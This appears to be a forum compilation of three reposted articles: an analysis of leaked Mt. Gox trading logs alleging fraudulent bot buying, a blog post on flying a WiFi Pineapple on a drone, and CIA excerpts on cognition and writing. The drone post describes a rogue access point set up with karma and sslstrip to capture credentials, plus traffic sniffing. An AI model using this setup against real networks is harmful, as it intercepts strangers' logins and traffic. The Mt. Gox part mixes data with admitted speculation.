27-9-2013 6:14 - UID: 698630 Type: buy Currency: EUR BTC: 10.0 Fiat: 1005.0
27-9-2013 6:14 - UID: 698630 Type: buy Currency: EUR BTC: 10.0 Fiat: 1005.0
27-9-2013 6:14 - UID: 698630 Type: sell Currency: USD BTC: 5.0 Fiat: 685.25
27-9-2013 6:15 - UID: 698630 Type: sell Currency: USD BTC: 0.5 Fiat: 68.53
27-9-2013 6:15 - UID: 698630 Type: sell Currency: USD BTC: 2.0 Fiat: 274.1
27-9-2013 6:15 - UID: 698630 Type: sell Currency: USD BTC: 1.0 Fiat: 137.05
27-9-2013 6:15 - UID: 698630 Type: buy Currency: USD BTC: 5.0 Fiat: 689.74
27-9-2013 6:16 - UID: 698630 Type: buy Currency: USD BTC: 3.44197225 Fiat: 475.2
There were several peculiar things about Markus. First, its fees paid were always 0. Second, its fiat spent when buying coins was all over the place, with seemingly completely random prices paid per bitcoin.
For reference, Markus is the "Glitch in the System" user in this excellent Gox DB visualization (on that note, all of the Willy accounts are the "Greater Fools", with just big green blotches around Oct-Nov). Upon further inspection of the log, the cause of these seemingly random values became clear: In this table, the first two trades (buy/sell pairs) are by some regular user with ID 238168. In the second trade, this user buys 0.398 BTC for $15.13. The next trade is some large market buy by Markus (ID 698630): note how the "$15.13" value from the previous trade seems to "stick"; regardless of the volume of BTC bought, the value paid is always $15.13. This is speculation, but perhaps for Markus the "Money" spent field is in fact empty, and the program that generates the trading logs simply takes whatever value was already there before. In other words, Markus is somehow buying tons of BTC without spending a dime. Interestingly, Markus also sells every now and then, and for some reason the price values are correct in this case. His biggest sell occurred on June 2nd. I've analyzed these trades separately here:
2-6-2013 8:22 - UID: 698630 Type: sell Currency: USD BTC: 1998.98799992 Fiat: 254788.4
2-6-2013 8:23 - UID: 698630 Type: sell Currency: USD BTC: 999.99999997 Fiat: 127026.48
2-6-2013 8:23 - UID: 698630 Type: sell Currency: USD BTC: 1000.0 Fiat: 127002.4
2-6-2013 8:24 - UID: 698630 Type: sell Currency: USD BTC: 1000.0 Fiat: 127018.51
2-6-2013 8:24 - UID: 698630 Type: sell Currency: USD BTC: 1000.0 Fiat: 127001.35
2-6-2013 8:24 - UID: 698630 Type: sell Currency: USD BTC: 1000.00000005 Fiat: 127004.44
...
2-6-2013 9:46 - UID: 698630 Type: buy Currency: USD BTC: 11.0 Fiat: 170.94
2-6-2013 9:46 - UID: 698630 Type: buy Currency: USD BTC: 0.02492337 Fiat: 85.47
2-6-2013 9:46 - UID: 698630 Type: buy Currency: USD BTC: 2.01257589 Fiat: 170.94
2-6-2013 9:46 - UID: 698630 Type: buy Currency: USD BTC: 4.0 Fiat: 97.81
2-6-2013 9:47 - UID: 698630 Type: buy Currency: USD BTC: 300.41544653 Fiat: 293.43
2-6-2013 9:47 - UID: 698630 Type: buy Currency: USD BTC: 14.99143981 Fiat: 2145.37
2-6-2013 9:47 - UID: 698630 Type: buy Currency: USD BTC: 50.02492337 Fiat: 277.66
2-6-2013 9:47 - UID: 698630 Type: buy Currency: USD BTC: 453.70848748 Fiat: 31294.09
2-6-2013 9:47 - UID: 698630 Type: buy Currency: USD BTC: 113.56988903 Fiat: 20.54
2-6-2013 9:47 - UID: 698630 Type: buy Currency: USD BTC: 0.0747685 Fiat: 2.93
Totals:
Start: 2-6-2013 8:22 End: 2-6-2013 9:47
User_ID: 698630 User: b2853e3c-3ec0-4fa5-8231-d21e2fd13330
BTC bought: 14770.555715840008 USD spent: $??.??
BTC sold: 31579.33902558999 USD received: $3,813,128.10
Net BTC sold: 16808.783309749982 Net USD received: $3,813,128.10 - $??.??
Sell 31k BTC, receive $4 million, re-buy 15k BTC, spend nothing. Awesome! Here is the corresponding chart for this day, just to show that these trades (from 8:00 to 10:00 am) actually occurred "on-market" and had a significant effect on the price. Some totals compiled for Markus:
Start: 14-2-2013 3:37 End: 27-9-2013 6:16
User_ID: 698630 User: b2853e3c-3ec0-4fa5-8231-d21e2fd13330
BTC bought: 335203.83080579044 USD spent: $??.??
JPY spent: 0.0 EUR spent: €2110.46
BTC sold: 37575.39028677996 USD received: $4,018,376.87
JPY received: ¥2,744,463.91 EUR received: 0.0
Net BTC bought: 297628.4405190105 Net USD spent: $??.?? - $4,018,376.87
Another net ~300,000 BTC bought. Combined with Willy's buys, that's around 570,000 BTC in total.
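For readers who want to check these numbers themselves, below is a minimal Python sketch (not the author's actual tooling) of the aggregation described earlier: drop exact duplicate rows, keep the "??" accounts, merge fills that belong to one market order (same user, within 2 seconds), and total BTC/USD per account. The file name, column names (Date, User_ID, User_Country, User_State, Bitcoins, Money) and the date format are assumptions modeled on the entries shown above, not the leaked CSV's real schema; adjust them to match the actual files.

import csv
from collections import defaultdict
from datetime import datetime

def load_trades(path):
    # Read one monthly log, dropping exact duplicate rows (the "THK" doubles).
    seen, rows = set(), []
    with open(path, newline="") as f:
        for row in csv.DictReader(f):
            key = tuple(sorted(row.items()))
            if key not in seen:
                seen.add(key)
                rows.append(row)
    return rows

trades = load_trades("2013-11_mtgox_japan.csv")        # hypothetical file name

# Keep only the suspicious accounts: User_Country and User_State both "??".
willy = [r for r in trades
         if r["User_Country"] == "??" and r["User_State"] == "??"]
for r in willy:
    r["when"] = datetime.strptime(r["Date"], "%d-%m-%Y %H:%M:%S")  # format assumed
willy.sort(key=lambda r: (r["User_ID"], r["when"]))

# Merge fills belonging to one market order: same user, fills <= 2 s apart.
orders = []
for r in willy:
    if (orders and orders[-1]["uid"] == r["User_ID"]
            and (r["when"] - orders[-1]["when"]).total_seconds() <= 2):
        orders[-1]["btc"] += float(r["Bitcoins"])
        orders[-1]["usd"] += float(r["Money"])
        orders[-1]["when"] = r["when"]
    else:
        orders.append({"uid": r["User_ID"], "when": r["when"],
                       "btc": float(r["Bitcoins"]), "usd": float(r["Money"])})

# Per-account totals, as in the compilation above.
totals = defaultdict(lambda: [0.0, 0.0])
for o in orders:
    totals[o["uid"]][0] += o["btc"]
    totals[o["uid"]][1] += o["usd"]
for uid, (btc, usd) in sorted(totals.items()):
    print(f"User_ID {uid}: BTC bought {btc:.8f}, USD spent {usd:,.2f}")

Run over the full set of monthly files, output along these lines should, in principle, line up with the Start/End/BTC/USD compilation above.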
Although there are no trading logs after November, Willy was observed by multiple traders to be active for most of December until the end of January as well. Although this was at a slower, more consistent pace (around 2000 BTC per day), it should roughly add up to another 80,000 BTC or so bought. So that's a total that's suspiciously close to the supposedly lost ~650,000 BTC.
So… hacker, or inside job? At this point, I guess the straightforward conclusion would be that this is how the coins were stolen: a hacker gained access to the system or database, was able to assign himself accounts with any amount of USD at will, and just started buying and withdrawing away. This is in line with what GoxDox.org reported last month (they leaked the Sunlot court filing, so clearly they have some inside info). After all, the constant creation of new Willy accounts seems almost intended to avoid detection. Unverified BTC withdrawals may have been possible until late 2013 (I could not find any exact data on this), or perhaps the "??" location values in the database (unlike the usual empty or "!!" values for unverified users) were able to fool the system into thinking this user was verified.
However, there are a lot of things that don't add up with this theory; in fact there is a ton of evidence to suggest that all of these accounts were controlled by Mt. Gox themselves. First, the obvious: Markus has Tokyo, Japan as its registered location. But any hacker could edit a DB entry to try and frame someone (or even be located in Tokyo, however unlikely). However, none of the Willy accounts until November appear in the leaked balance summary at the time of collapse, and there seem to be no corresponding withdrawals for those amounts of bitcoin bought. Markus does have a balance: around 20 BTC and small amounts of EUR, JPY and PLN. No USD balance. In other words, only currencies for which Mt. Gox actively controlled bank accounts.
The next piece of evidence is perhaps more convincing. For some months in 2013, there were two versions of trading logs in the leaked database: a full log, and an anonymized log with user hashes and country/state codes removed. For April 2013, there was a .zip file which contained one such anonymized log; this is speculation, but one use of this may have been to send off to auditors/investors to show some internals. Upon closer inspection, it turns out the full and anonymized versions of all the logs differ in two, and ONLY two, ways:
1. User hashes and country/state codes are removed.
2. Markus's out-of-place user ID (698630) is changed to a small number (634), and its strange fixed "Money" values are corrected to the expected values.
Interesting detail: in the 2011 leaked account list, the user with ID 634 has username "MagicalTux". Compare these two tables:
The "fixed" file has an earlier creation date than the full log, so it could not have been a reporting bug that was fixed later. Everything points to these values having been manually edited, presumably to erase traces of suspicious activity. Another possibility is that it is actually the other way around: the correct log with the earlier creation date was the original, and all the other logs were altered to a different ID not traceable to MagicalTux to cover up fraud in a very lazy way (by setting all Money spent to whatever was the last trade), and someone forgot there was still a zip file lying around with the unaltered data. Another thing: Willy seemed to be immune to network downtime.
The latest four trades displayed in the bottom-right corner showcase Willy's typical trading activity observed from December onwards: a 10-20 BTC buy every 5-10 minutes. At a time when no one else was able to trade, be it via API or otherwise, Willy was somehow able to continue as if nothing ever happened. This makes it likely the bot was being run from a local Mt. Gox server. It is not impossible that a hacker was able to install some kind of rootkit on Mt. Gox's servers and ran the bot from there, but that seems extremely unlikely.
Before Markus
Of course, I was curious to see if the April 2013 bubble was just as fake as the November 2013 bubble (as should be evident from the above data, and the more detailed price analysis below). Although I could find no clear single buy bot active during the February-April run-up (Markus bought a significant amount of coins, but not enough to sustain the prolonged rally), there was still tons of suspicious activity in the log. When browsing through the trading data sorted by user ID, I noticed a huge number of active "Japan" users with very low user IDs (<1000). None were paying fees. Odd to say the least, so I investigated further. It turns out a lot of these trades followed a very distinct pattern, and were unlikely to have been executed by their original account holders; rather, these accounts were "hijacked" in some way. The image below shows an example of this pattern: First, a user with ID 179200 (highlighted; it is always this user as far as I can tell) buys some very exact amount of JPY worth of BTC (in this case JPY 24000) from regular users. Immediately after, a mysterious low-ID JP user also buys up some exact amount of JPY worth of BTC (always several times more than what user 179200 bought). This happens over and over again, for different low-ID users. But here's the interesting thing: the user _hashes_ for these low-ID JP users do not match the user hashes of the original account holders. Look at this: The data is sorted by user ID. Highlighted is the likely original, legit user making a legit trade. The hash is different from the fraudulent user's (who has "JP" as region and does not pay fees). This rules out that these were inactive accounts being liquidated (the Mt. Gox terms of service stated they had the right to close accounts inactive for longer than 6 months). And as I said, these were not isolated cases. The first occurrence seems to have been on August 9th, 2012, 08:54:58 GMT. These users were especially actively buying until April 2013 (probably tens if not hundreds of thousands of coins; I haven't analyzed that far), although sometimes selling (for JPY) as well. From May 2013 they became less active (to the point of insignificance for price movement), buying smaller amounts until July or so, when they start selling more than buying. The activity continues until the end of the data (November 2013). Interestingly, there was a post by MagicalTux on bitcointalk.org about him finding and fixing a bug, about five hours after the first occurrence of this phenomenon. And as it happens, most of these "hijacker" user hashes appear in the final balances file; all have only some very small JPY balance. So they at least satisfy the first two conditions for triggering the bug explained in that post. There is a possibility that the bug was not fully fixed and that this activity was an exploit of it.
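To make the pattern concrete, here is a small, hedged sketch of a filter for it: very low user IDs, "JP" as region, zero fees paid, and a user hash that differs from a hash recorded elsewhere for the same ID. As before, the file and column names (including "Fee") are assumptions, not the leaked database's real schema.

import csv
from collections import defaultdict

with open("2013-04_mtgox_japan.csv", newline="") as f:   # hypothetical file name
    trades = list(csv.DictReader(f))

hashes = defaultdict(set)          # User_ID -> every user hash seen with that ID
for r in trades:
    hashes[r["User_ID"]].add(r["User"])

def looks_hijacked(r):
    return (r["User_ID"].isdigit() and int(r["User_ID"]) < 1000  # very low ID
            and r["User_Country"] == "JP"                        # "Japan" region
            and float(r["Fee"] or 0) == 0.0                      # pays no fees
            and len(hashes[r["User_ID"]]) > 1)                   # one ID, 2+ hashes

flagged = [r for r in trades if looks_hijacked(r)]
print(len(flagged), "trades match the hijacked-account pattern")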
After Willy - Speculation
Since there are no logs past November 2013, the following arguments are largely based on personal speculation, and that of other traders, with less hard evidence attached to them. Take them however you will. I'm sure a lot of this will be proven wrong, but hopefully it will give some insight into what transpired in Mt. Gox's final days. Based on my own personal observations, Willy continued to be active until January 26th: buying up 10-20 BTC every 5-10 minutes, for around 100 BTC per hour. It was not active all the time, but the majority of it. January was when things truly went awry for Mt. Gox; more and more withdrawals were getting stuck, and faced with information that JPY withdrawals (which had been instant until that point) were also getting unreasonably delayed, people began panic-buying their way out of Gox. Combined with Willy still being active, this caused the spread between Gox and other exchanges to get completely out of hand. At the pinnacle of it, on January 26th, Willy suddenly became inactive, and with it, the price retraced back to a more reasonable spread with the other exchanges. Shortly after (on February 3rd, to be precise) it seemed as if Willy had begun to run in reverse, although with a slightly altered pattern: it seemed to sell around 100 BTC every two hours. The hourly chart shows this quite well; there was almost no other trading volume for two days straight, so we saw a very straight declining slope on the chart. It didn't take long for reverse-Willy to increase its pace. More than likely, the entire dump down to double digits was the handiwork of this dumping bot. Peter R, another trader, came to the same conclusion independently of me in his excellent analysis, which may just be very close to the truth. It would be one explanation for why none of the Willy accounts had a final balance despite all of their buying and no trace of BTC withdrawals: they were all dumped back on the market. The volume numbers seem to roughly match up. Where did the fiat go then? Into Mt. Gox's reported fiat assets, possibly. You may remember they all but halted JPY withdrawals in early January, yet somehow cleared ALL pending JPY withdrawals the day they shut down in late February. This proves their original reason for the delays (currency conversion issues) was BS; they simply had no fiat left. Yet somehow they had enough fiat for withdrawals the day they shut down, which was after the dumping had already started. But, again, speculation. There's some additional evidence on the chart that a dump bot may have been at play. At several points in time, starting from Feb. 18th, it seemed that some bot was programmed to sell down to various fixed price levels. The most obvious cases are shown in these images, from Feb. 18th (top) and from Feb. 19th (bottom): every time someone put a bid at or above USD $248.15 and $261.2239, respectively, it would get dumped into at most a few minutes later (see e.g. this post from someone who noticed the same thing). These seem like random price-points at first, but at that point in time, $248.15 corresponded to exactly JPY 26000, and $261.2239 corresponded to exactly EUR 195. But here's the kicker: NONE of the sell dumps were performed in their respective currency pairs; ALL were in USD. It suggests that whoever was selling (1) had some way to convert USD to JPY/EUR in a frictionless way, and/or (2) needed these currencies to be at a fixed price for some reason.
After reading this log about possible insider trading from anarchystar, who is closely involved in the Mt. Gox legal proceedings, (2) may in fact have been the purpose: perhaps Mt. Gox was offering a fixed buy-in price for JPY or EUR-based investors. In either case, only Mt. Gox executing these sell trades makes sense. Furthermore, in an IRC log where someone was impersonating MagicalTux by hijacking his nick, Charlie Shrem asks if he needs some liquidity. This was at a time when withdrawals were already halted. Clearly, Mt. Gox was accepting fiat injections; it seems reasonable to assume this liquidity came in the form of cheap BTC being bought. Additional factoid: a month or two ago, someone put up a site that aggregated the data from the leaked DB and allowed one to traverse the data easily, with rankings for best and worst traders, etc. One page of it is archived here. It had the (undoubtedly ironically intended) domain name "mark-karpeles.com". It seems the site was fairly quickly removed, and "mark-karpeles.com" now redirects directly to the official mtgox.com. Barring an unlikely sudden change of heart by the creator, from trying to expose fraud at Mt. Gox to supporting it, somebody may have threatened legal action or paid big bucks to get it under their control. In other words, someone was pretty desperate to prevent the data from becoming public.
The Effect on the Bitcoin Price
So how did all of this trading activity affect the price of Bitcoin as a whole? The answer is, unfortunately, enormously. I will be placing some historical charts from bitcoincharts.com alongside the Markus and Willy trade data where buying was most aggressive, which is basically from 15:14, July 28th, 2013 until the end of November. You can double-check exactly when and how many coins were bought using the logs near the top of this report, and/or match them against historical trading data from Mt. Gox's public API. All of these trades actually occurred. The huge volume spike on July 28 15:14 is where the big buying starts. 15,000 coins get bought in the span of 30 minutes. According to the trade data, buying continues until the 31st, 15:55. After a four-day pause, there's some small buying on August 5th, but it really picks up again on the 12th at 21:32. Buying continues on-and-off, with some large spikes especially on the 19th, 27th and the 30th, where tens of thousands of coins are bought. Basically, all the huge green volume spikes in the above chart are the handiwork of Markus, and Markus alone. Something for the TA people: Note the date, which is the moment we broke the post-April bubble downtrend. In September, a few thousand coins were bought on the 2nd and 3rd, and then nothing until a lot was bought on the 9th, then on the 11th through early 13th. In the period of inactivity, the price finally got the chance to correct from an overbought condition. Unsurprisingly, price rose again when Markus resumed buying, then started falling again when Markus stopped on the 13th. There was no activity from Markus until late on the 26th/early on the 27th, when Markus made his final buys before handing the baton over to Willy, who would in turn continue aggressive, but much more constant, buying until early October 1st. Again, the price reflected this activity perfectly. Then came October, with the Silkroad shutdown crash on the 2nd. Price was flat for a while - because Willy did not become active until 10-10-2013 0:49. Now, unlike Markus, Willy's buying was a lot more spread out over time.
Markus was active sporadically, buying thousands or tens of thousands of coins in bursts, whereas Willy was active almost constantly, at first buying anywhere from 1 to 50 BTC at ~5-10 minute intervals. But even Willy would sometimes have gaps of inactivity (usually a day or less). These show up nicely in the chart. Willy was not active for most of the 15th and not active for about 14 hours on the 22nd. Price goes flat in these intervals. On 24-10-2013 14:24, Willy becomes inactive for exactly a week, until 31-10-2013 14:44. As though perfectly timed, price crashes and growth stagnates. Finally, November. Willy continues buying at its ~1-50 BTC per ~5-10 minutes rate until 5-11-2013 7:48. From 5-11-2013 10:53, Willy ups the ante: ~10-100 BTC is now bought at ~5-10 minute intervals, with many bursts of hundreds or thousands of BTC being bought at once. This continues non-stop until 9-11-2013 16:51. Willy becomes inactive for two days. Price crashes as if on cue. From 11-11-2013 14:04, Willy is back at its original pace, with occasional 100-1000+ BTC buys, until 16-11-2013 13:31. Short Willy inactivity until 17-11-2013 2:57, with inevitable growth stagnation. Then relatively stable buying until 23-11-2013 8:35. A day of inactivity, cue price decline. Re-activation on 24-11-2013 9:16. Cue price growth. The 100-1000+ BTC buy bursts finally end on 28-11-2013 15:10, where Willy enters its final stage that we all recognized (~10-20 BTC every ~5-10 minutes). The reduced activity causes growth stagnation. And we all know what happened next.
In closing, I want to make clear that this report is not intended to make accusations, but rather to show the facts that can be extracted from the information that is available to the public, and to show that there is more than enough evidence to suspect that what happened at Mt. Gox may have been an inside job. What I hope to achieve by releasing this analysis into the wild is for the public to learn the truth behind what happened at Mt. Gox and how it affected the Bitcoin price, and hopefully for the individuals responsible for the massive fraud that occurred at Mt. Gox to be brought to justice. Although the evidence shown in this report is far from conclusive, it can hopefully spur a more rigorous investigation into Mt. Gox's accounting data, both by the public (using the leaked data) and the authorities (forensic investigation on the actual data). It needs to be recognized that, whether intentionally or not (though plausible ignorance only goes so far), Mt. Gox has effectively been abusing Bitcoin to operate a Ponzi scheme for at least a year. The November "bubble" well into the $1000s (and possibly April's as well) was driven by hundreds of millions of dollars of fake liquidity pumped into the market out of thin air (note that this is equivalent to "with depositors' money"). It is only natural that the Bitcoin price would deflate for around 5 months after its December peak, since there was never enough fiat coming in to support these kinds of prices in the first place. In the interest of full disclosure: I've known of everything I wrote in this report since basically a day after the database was leaked, well over 2 months ago. I'm sure there are at least some other people who knew about it - I mean, it's there in plain sight, in publicly available data, so it surprises me that no one else has come out with it until now. I specifically waited for the Goxless, free market to finally break the ongoing downtrend on its own strength before releasing it.
Barring similar shenanigans at other exchanges (looking at you, China), I think this means we may be at a "fair" valuation now, and that this knowledge will not hurt the price all that much. That said, despite everyone's expectations, it seems unlikely that there will be another huge "bubble", seeing as they were never "real" in the first place. Hopefully, price can rise at a more controlled pace as more and more good news comes out; it will be much better for Bitcoin as a technology than the crazy volatility and outrageous valuations we saw last year.
Sursa: The Willy Report: proof of massive fraudulent trading activity at Mt. Gox, and how it has affected the price of Bitcoin | The Willy Report
  17. Project "AirCrack1": Warflying
May 24, 2014 17:37 | 8 Comments | Xavier
If we can put business and some fun together, why the hesitation? For a while, I've been playing with flying toys. I already played with different models of RC helicopters, and recently I switched to another category: I bought a quadcopter. The idea of mixing drone technology with WiFi audits had been in my mind for a while. First of all, this is nothing new. Darren from Hak5 had the same crazy idea before me (see episode 1520). But there is a difference between watching a cool video and doing the same in real life. Thus, I decided to run the same experiment! And if I could use it to perform WiFi assessments or pentests, it's even cooler! My choice was the DJI Phantom FC40. Phantoms are great quadcopters: very easy to pilot using the built-in Naza-M V2 module, and they are able to carry stuff! In most cases drones carry a camera, but pretty much any other type of goods can be carried (even pizza ;-). And which device is the best choice to play with WiFi networks? A Pineapple of course! I've got a Mark5 (the latest generation) and trust me, it is uber cool… What else do you need?
Some power
Internet connectivity
To connect to the Internet, I'm using a USB 3G modem with a data-only SIM card. The Mark5 supports common 3G devices out of the box. To provide power, my initial idea was to use the drone battery, but the risk of electromagnetic issues between the drone and the Pineapple was too high. Thus, I chose to use a dedicated battery (and this won't affect the drone's autonomy!). First, I used a Pineapple Juice 1800 battery, but I was afraid of the weight and volume. I decided to go with another type of battery: a LiPo 900. LiPo batteries are very common in the aeromodelling landscape and have an excellent weight/size-to-performance ratio. This battery is enough for flying around and sniffing some traffic. To connect the LiPo to the Pineapple, a simple cable converting the LiPo connector to a "jack" connector is required. If the goal is to fly the drone to your target, land on a roof and spend more time over there, I think I'll use the Pineapple Juice model. To be investigated… The choice of the DJI Phantom "FC40" was very important. Why? This model operates at 5.8 GHz for communication between itself and its remote controller. This frees up the classic 2.4 GHz band used by the camera to communicate via WiFi with a smartphone (to provide the FPV or "First Person View"). The Pineapple uses the same 2.4 GHz band and will not interfere with the remote controller. The total weight to carry (Pineapple, USB modem, LiPo battery and cables) is 225 grams. This is totally acceptable for a Phantom! Everything fits under the drone and is secured with Velcro bands. I was afraid of the center of gravity, but it fits perfectly! The following pictures show the Phantom ready to fly: Another issue could be the sensitivity of the drone while flying. Two important things to keep in mind:
By carrying more stuff, you add weight, and this may affect the pilot's sensations (ask any helicopter pilot!)
By carrying electronic devices, you increase the risk of electromagnetic perturbations. A good example is the antennas, which are located along the landing legs (GPS & remote controller).
The drone found its GPS position as usual and was able to fly safely, keeping its position throughout the flight. I just had the feeling that the drone was a little bit slower to respond. Of course the autonomy is greatly reduced.
How to keep an eye on the WiFi tools? The Pineapple has built-in support for autossh. When it boots, it connects to the Internet via the 3G modem, SSHes to one of my servers, and establishes a remote tunnel with the "-R" flag.
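As an illustration of what autossh takes care of here, the loop below is a minimal Python sketch that keeps such a reverse tunnel alive. The relay host and ports are hypothetical; on a real Pineapple you would simply configure autossh itself:

import subprocess
import time

# Keep "ssh -R" running, reconnecting whenever the flaky 3G link drops.
CMD = [
    "ssh", "-N",
    "-o", "ServerAliveInterval=30",     # detect a dead tunnel quickly
    "-o", "ExitOnForwardFailure=yes",   # exit (and retry) if the -R bind fails
    "-R", "2222:localhost:22",          # server port 2222 -> Pineapple's SSH
    "pineapple@relay.example.com",      # hypothetical relay server
]

while True:
    subprocess.call(CMD)                # blocks for as long as the tunnel is up
    time.sleep(10)                      # short backoff before reconnecting

With a tunnel like this up, "ssh -p 2222 root@localhost" on the relay server lands on the Pineapple, wherever the drone happens to be.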
With this technique, I'm able to connect safely to the Pineapple and follow the operations directly on my iPhone screen, as seen in the following picture. It's very difficult to keep an eye on the drone and on the screen at the same time. I would recommend two people to conduct the attack: the pilot and a "WiFi operator" (with a classic laptop for more convenience). This was a successful experience! Data was captured without problem. My Pineapple config is the following:
wlan0 : karma + sslstrip (to capture credentials)
wlan1 : airodump (to capture traffic for later use)
Of course, all the attacks that can be launched from a Pineapple can be done from the sky! Think about the WiFi jammer infusion ;-). What's next? My plan is to script some kind of "flying scanner" which will detect and connect to open networks to perform an Nmap scan. Disclaimer: this is done for research purposes only, and it's better to have a "Get Out of Jail" card if you use this setup in pentests…
Sursa: Project "AirCrack1": Warflying | /dev/random
  18. Thinking & Writing: The CIA's Guide to Cognitive Science & Intelligence Analysis
This CIA monograph (re-released in 2010 by Robert Sinclair) presents "the implications of growing knowledge in the cognitive sciences for the way the intelligence business is conducted - in how we perform analysis, how we present our findings, and even its meaning for our hiring and training practices". In other words, this paper is about "thinking and writing [and] the complex mental patterns out of which writing comes, their strengths and limitations, and the challenges they create, not just for writers but for managers". Below are some curated excerpts. P.S. Don't confuse this paper with the popular CIA book "Psychology of Intelligence Analysis", which I have linked to in the past. This paper draws upon similar cognitive research but has a different focus (mainly that of communicating clearly).
Introduction
Two quotations sum up what this essay is about:
"Our insights into mental functioning are too often fashioned from observations of the sick and the handicapped. It is difficult to catch and record, let alone understand, the swift flight of a mind operating at its best."
"A writer in the act is a thinker on a full-time cognitive overload."
"In brief, I hope to describe some of the powerful metaphors about the workings of our minds that have developed over the past couple of decades."
"…although this essay talks a lot about writing, it is not designed to deal with the how-to-write issue. As the title indicates, its topic is thinking and writing: the complex mental patterns out of which writing comes, their strengths and limitations, and the challenges they create, not just for writers but for managers."
"I would argue that the elements of cognitive science highlighted in the monograph are still the ones of first-order relevance for the DI. I do not think an intelligence analyst will gain much professionally from knowing how neurons fire or which parts of the brain participate in which mental operations. I do consider it essential, however, that we be aware of how our brains ration what they make available to our conscious minds as they cope with the fact that our "ability to deal with knowledge is hugely exceeded by the potential knowledge contained in man's environment." Not only do they select among outside stimuli, they also edit what they let us know about their own activities. This is the focus of the monograph."
"For every analyst and every reviewer in this serial process, the analysis starts from a body of analogies and heuristics that are unique to that individual and grow out of his or her past experience: after-images of ideas and events that resonate when we examine a current problem, practical rules of thumb that have proven useful over time. The power of this approach is incontestable, but we are all too easily blinded to its weaknesses. The evidence is clear: analysis is likely to improve when we look beyond what is going on in our own heads—when we use any of several techniques designed to make explicit the underlying structure of our argument and when we encourage others to challenge our analogies and heuristics with their own.
Little about the current process fosters such activities, it seems to me; they would be almost unavoidable in a collaborative environment."
On Writing
"If the very act of writing puts a writer—any writer at all—into "full-time cognitive overload," then perhaps we would benefit from a better understanding of what contributes to the overload."
"The novelist and poet Walker Percy offers a concept that may be even more fruitful. In a series of essays dealing with human communication, Percy asserts that a radical distinction must be made between what he calls "knowledge" and what he calls "news." Percy's notion takes on added significance in light of the findings of cognitive science (of which he seems largely unaware), and I will be discussing it at greater length in due course. For the present, I would simply assert that the nature of our work forces us to swing constantly back and forth between knowledge and news, and I believe cognitive science has something to contribute to our understanding of the problem."
Why We Use Heuristics / Mental Shortcuts In Decision Making
"What is it about heuristics that makes them so useful? First, they are quick and they get the job done, assuming the experiential base is sufficient and a certain amount of satisficing is not objectionable. Second, what cognitive scientists call the problem-space remains manageable. Theoretically that space becomes unmanageably large as soon as you start to generalize and explore: any event may be important now, any action on your part is possible, and you could get paralyzed by possibilities as the centipede did. But humans constantly narrow the problem-space on the basis of their own experience. And most of the time the results are acceptable: what more efficient way is there to narrow an indefinitely large problem-space?"
Limits To Using Heuristics / Mental Shortcuts In Decision Making
"Heuristics are inherently conservative; they follow the tried-and-true method of building on what has already happened. When the approach is confronted with the oddball situation or when someone asks what is out there in the rest of the problem-space, heuristics begin to flounder. Yet we resist using other approaches, partly because we simply find them much less congenial, partly because the record allows plausible argument about their effectiveness when dealing with an indefinitely large set of possibilities."
"As most people use them, heuristics are imprecise and sloppy. Some of the reasons why cognitive activity is imprecise were noted earlier; another reason is the tendency to satisfice, which encourages us to go wherever experience dictates and stop when we have an adequate answer. With perseverance and sufficient information one can achieve considerable precision, but there is nothing in the heuristic approach itself that compels us to do so and little sign that humans have much of an urge to use it in this way. Most of the time, moreover, the information is not terribly good. We then may find ourselves trying to get more precision out of the process than it can provide."
"In everyday use, heuristics are not congenial to formal procedures such as logic, probability, and the scientific method.
This fact helps explain why we rarely use logic rigorously, why we tend to be more interested in confirming than in disconfirming a hypothesis, and why we are so poor at assessing odds."
We Can't Talk About Mental Shortcuts Without Talking About Memory & "Chunking"
"It should be apparent the heuristic approach is critical to the effectiveness of our conscious mental activity, since short-term memory needs procedures like heuristics that narrow its field of view. On the other hand, the drawbacks are equally apparent. The ability to process large quantities of information is always an advantage and sometimes a necessity. How can we operate effectively if we can consider so little at a time? The answer to this question lies in the speed and flexibility with which we can manipulate the information in short-term memory; to use the terminology, in our chunking prowess."
Accessed via Robert Sinclair's Overview of Cognitive Science & Intelligence (written for the CIA)
A chunk, it should be clear, equates to one of the roughly seven entities that short-term memory can deal with at one time. Hunt's formulation notwithstanding, it need not be tied to words or discrete symbols. Any conceptual entity (from a single letter to the notion of Kant's categorical imperative) can be a chunk. And not only do we work with chunks that come to us from the outside world, we create and remember chunks of our own. Anything in long-term memory probably has been put there by the chunking process. We build hierarchies of chunks, combining a group of them under a single conceptual heading (a new chunk), "filing" the subordinate ideas in long-term memory, and using the overall heading to gain access to them. We can manipulate any chunk or bring wildly differing chunks together, and we can do these things with great speed and flexibility.
"In some ways "chunk" is a misleading term for the phenomenon. The word calls to mind something discrete and hard-edged, whereas the very essence of the phenomenon is the way we can give it new shapes and new characteristics, and the way conceptual fragments interpenetrate each other in long-term memory. A chunk might better be conceived of, metaphorically, as a pointer to information in long-term memory, and the information it retrieves as a cloud with a dense core and ill-defined edges. The mind can store an enormous number of such clouds, each overlapping many others. This "cloudiness" (the way any one concept evokes a series of others) is a source of great efficiency in human communication; it is what lets us get the drift of a person's remarks without having all the implications spelled out. But it can also be a source of confusion."
Heuristics / Mental Shortcuts & "Chunking" Work Hand in Hand During Decision Making
"Heuristics—non-random exploration that uses experience and inference to narrow the field of possibilities—loom large in the development of each individual and are deeply ingrained in all of us (particularly when we are doing something we consider important). Combined with the chunking speed of short-term memory, the heuristic approach is a powerful way to deal with large amounts of information and a poorly defined problem space."
"But there is always a tradeoff between range and precision. The more of the problem space you try to explore—and the "space," being conceptual rather than truly spatial, can have any number of dimensions—the harder it is to achieve a useful degree of specificity.
Talent and experience can often reduce the conflict between the need for range and the need for precision, but they cannot eliminate it. We almost always end up satisficing.”

“We are compulsive, in our need to chunk, to put information into a context. The context we start with heavily conditions the way we receive a new piece of information. We chunk so rapidly that “the problem,” whatever it is, often has been sharply delimited by the time we begin manipulating it in working memory.”

“Although the conceptual network formed through years of experience may make an individual a more skillful problem-solver, it can also make him or her less open to unusual ideas or information—a phenomenon sometimes termed “hardening of the categories.” The conservative bias of the heuristic approach—the tendency we all share of looking to past experience for guidance—makes it easy for an old hand to argue an anomaly out of the way. In fact the old hand is likely to be right nearly all the time; experience usually does work as a model. But what about the situation when “nearly all the time” isn’t good enough? Morton Hunt recounts an instance of a computer proving better than the staff of a mental hospital at predicting which patients were going to attempt suicide.”

Cognitive Aspects of Speaking & Writing

Here are some of the ways in which writing and speech differ:

